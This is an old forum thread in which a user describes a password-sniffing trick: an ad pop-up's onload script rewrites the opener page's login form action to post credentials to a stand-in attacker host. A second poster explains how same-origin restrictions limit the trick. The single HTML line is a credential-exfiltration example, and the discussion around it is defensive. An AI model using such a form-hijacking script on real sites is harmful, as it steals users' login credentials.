form action password sniffing?

  • Thread starter riku at wap ice dot com

riku at wap ice dot com

Security hole for dummies:

Let's say I have a login screen with a lot of advertisements (links).
One of those links is opened in a new window, and there it contains the following:

<body
onload="opener.document.forms[0].action='http://www.hackerz.com/PasswordDatabase.php';">

After clicking the link and reading the advertisement, I go on "logging
in" on the first window. After I submit, the form data, username,
password and all, is submitted to a third party.


Is this old news? (I don't follow this news too often.) Any comments,
fixes, anything?

Erwin Moller

Hi,

my 2 cents:

In the case you describe the pop-up stuff is probably hosted somewhere else, via
some advertising company (hate them).
I think all modern browsers don't allow JavaScript to do anything on a
window that is hosted from another server.

so: window1: http://www.serv1.com/page.htm
window2: http://www.serv2.com/page.htm

The script on window2 cannot access window1.

In that case you are safe.

If however both are hosted from the same server, your trick will work.
Just another good reason not to fill your own server with scripts from some
untrusted party.

Regards,
Erwin Moller

riku at wap ice dot com

> I think all modern browsers don't allow javascript doing anything on a
> window that is hosted from another server.

Ok, that helps. I had only one host to test it on.

> If however both are hosted from the same server, your trick will work.

A good reason not to use any domains offering free web pages under the
same hostname. I wonder if there are any abuses using this trick?

Thanks for replying!